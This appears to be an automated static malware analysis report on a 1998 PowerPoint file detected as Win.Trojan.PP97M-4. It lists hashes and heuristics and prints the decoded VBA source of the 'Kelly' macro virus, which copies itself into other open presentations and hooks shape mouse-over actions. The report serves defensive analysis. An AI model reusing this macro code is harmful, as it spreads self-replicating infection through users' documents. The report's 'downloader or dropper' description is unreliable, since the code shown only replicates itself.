Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f6697b432fbdccf7…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 12.5 KB
Created: 1999-01-25 10:08:15
Authoring application: Microsoft PowerPoint
First seen: 2012-06-14
MD5: 421e777dda55652f51fae95122506310
SHA-1: 046d2bfa890944c885ac66cf41a98d38a13bb52a
SHA-256: f6697b432fbdccf7af2f4eeb9cb11e727c6d0763ddf86e2f4acb03b03d7e6dbc
Risk Score: 80

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

This PowerPoint file contains VBA macros detected by ClamAV as Win.Trojan.PP97M-4. The macro code, named 'Kelly', is designed to copy itself to other open presentations and execute. This behavior suggests a downloader or dropper functionality, aiming to spread and potentially execute further malicious code, though no specific payload or network indicators were extracted.

Heuristics (2)

  • ClamAV: Win.Trojan.PP97M-4 (severity: critical, rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Win.Trojan.PP97M-4
  • VBA macros detected (severity: medium, rule: OLE_VBA_MACROS)
    Document contains VBA macro code

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 656 bytes
SHA-256: 059c1ec401199eb56ca5062920646695c5ce2e6d58b37b1b51ebebbf67744ad2
First 1,000 lines of the extracted script
Attribute VB_Name = "Kelly"
'Copyright (C) 1998 by FlyShadow ~^^~ - Kelly
Sub ι(Kelly)
On Error Resume Next
Set α = ActivePresentation.VBProject.VBComponents("Kelly").CodeModule
ν = α.CountOfLines + 1: λ = α.Lines(1, ν)
For Each ν In Presentations
If ν.VBProject.VBComponents(α).Name <> α Then
ν.VBProject.VBComponents.Add(1).Name = α
ν.VBProject.VBComponents(α).CodeModule.InsertLines 1, λ
For Each η In ν.Slides(ν.Slides.Count).Shapes
If η.ActionSettings(ppMouseOver).Action = 0 Then _
η.ActionSettings(ppMouseOver).Action = ppActionRunMacro: _
η.ActionSettings(ppMouseOver).Run = "ι"
Next: End If: Next
End Sub